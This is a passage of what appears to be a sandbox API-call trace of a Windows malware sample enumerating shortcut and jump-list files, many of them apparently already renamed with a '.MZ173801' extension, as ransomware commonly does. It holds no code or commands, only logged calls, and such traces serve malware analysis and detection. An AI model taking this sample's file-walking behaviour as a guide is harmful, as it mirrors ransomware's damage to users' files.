ftCreationTime.dwLowDateTime=0x4f404d4a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x3fa2484c, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0x3fa2484c, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x4ef2, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="6824f4a902c78fbd.customDestinations-ms", cAlternateFileName="6824F4~1.CUS")) returned 1 [0113.407] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.407] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.407] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbfad9510, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe96819d1, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe96819d1, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1 [0113.407] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.407] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.407] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0effce, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x98e794b5, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x98f80fc0, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="9d1f905ce5044aee.customDestinations-ms", cAlternateFileName="9D1F90~1.CUS")) returned 1 [0113.408] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.408] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.408] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf9a81f7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe959cb77, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xe959cb77, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="f01b4d95cf55d32a.customDestinations-ms", cAlternateFileName="F01B4D~1.CUS")) returned 1 [0113.408] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.408] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.408] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b77e1, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0xb6cf5ae9, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6cf5ae9, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="f18460fded109990.customDestinations-ms", cAlternateFileName="F18460~1.CUS")) returned 1 [0113.408] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0113.408] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0113.408] FindNextFileW (in: hFindFile=0xa1bd20, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b77e1, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0xb6cf5ae9, ftLastAccessTime.dwHighDateTime=0x1d5e7c2, ftLastWriteTime.dwLowDateTime=0xb6cf5ae9, ftLastWriteTime.dwHighDateTime=0x1d5e7c2, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="f18460fded109990.customDestinations-ms", cAlternateFileName="F18460~1.CUS")) returned 0 [0113.408] GetLastError () returned 0x12 [0113.408] FindClose (in: hFindFile=0xa1bd20 | out: hFindFile=0xa1bd20) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x44111bf3, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x44111bf3, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb18b052, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb18b052, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa174e275, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3b9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Dfoi.lnk.MZ173801", cAlternateFileName="DFOILN~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea71cc0e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9fcfcd57, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa174e275, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x382, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="di1GF8YsdAcjrR-s.lnk.MZ173801", cAlternateFileName="DI1GF8~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeadb10bc, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9c058eb8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1774488, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x408, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="dQSfhEFRy_gFg.lnk.MZ173801", cAlternateFileName="DQSFHE~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3af699, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x7d49f8ae, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1774488, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x50c, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Ds2vVA7R.lnk.MZ173801", cAlternateFileName="DS2VVA~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb819531, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb819531, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa1cab7d0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x440, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="E5xn1.ots.lnk.MZ173801", cAlternateFileName="E5XN1O~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75e13028, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75e13028, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1cd190e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3bf, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="EIGtc7lwmfk.lnk.MZ173801", cAlternateFileName="EIGTC7~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea257de6, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea257de6, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa1cd190e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3e5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="eiwjZXFfC09j.lnk.MZ173801", cAlternateFileName="EIWJZX~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75a572e4, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x75a572e4, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1cf7bfa, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="EtLEEKM-JP9vt.lnk.MZ173801", cAlternateFileName="ETLEEK~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea50696e, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x9cc1e63b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1db661b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x366, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="F yK2LwO.lnk.MZ173801", cAlternateFileName="FYK2LW~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb841258, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x91e557dc, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1e02be1, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x37a, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Fhb23ambk-o.lnk.MZ173801", cAlternateFileName="FHB23A~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb69bdfe, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb69bdfe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa1e28e41, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3cb, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Fnu1ZEKDFkx.lnk.MZ173801", cAlternateFileName="FNU1ZE~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.409] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.409] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d04a7b8, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x9d04a7b8, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa1e28e41, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4a7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="fYWa4.lnk.MZ173801", cAlternateFileName="FYWA4L~1.MZ1")) returned 1 [0113.409] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec1569fd, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec1569fd, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa2575fc3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3fe, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="g2GKlHNibJE_MvHnw.lnk.MZ173801", cAlternateFileName="G2GKLH~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea14d06b, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea14d06b, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa2575fc3, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3c5, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="G5n4vH.lnk.MZ173801", cAlternateFileName="G5N4VH~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeac0794c, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeac0794c, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa259eeeb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x5f1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="GuM0xcHUsONHLGItnv.lnk.MZ173801", cAlternateFileName="GUM0XC~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea389344, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea389344, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa259eeeb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="H0Fbjn1UaDFSWci6YS.lnk.MZ173801", cAlternateFileName="H0FBJN~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea873e9a, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xea873e9a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa259eeeb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="H4CXj5T.lnk.MZ173801", cAlternateFileName="H4CXJ5~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec2619b3, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec2619b3, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa2765ef0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x348, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="hEI_tuSWJhfHIz05Nj8z.flv.lnk.MZ173801", cAlternateFileName="HEI_TU~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0e430d, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xec0e430d, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa2765ef0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2f4, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="HPSq.lnk.MZ173801", cAlternateFileName="HPSQLN~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb295f31, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xeb295f31, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xa278c16b, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x266, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="hrJq.lnk.MZ173801", cAlternateFileName="HRJQLN~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f810d3f, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x7f810d3f, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa27d86b6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x3c9, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="HzRoNmrPEEYbe.lnk.MZ173801", cAlternateFileName="HZRONM~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x762fcc68, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x762fcc68, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa284accd, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x2b0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="If9wR_2_gcr9llsoyR.lnk.MZ173801", cAlternateFileName="IF9WR_~1.MZ1")) returned 1 [0113.410] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0113.410] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0113.410] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cfac35, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0xe9cfac35, ftLastAccessTime.dwHighDateTime=0x1d5f12a, 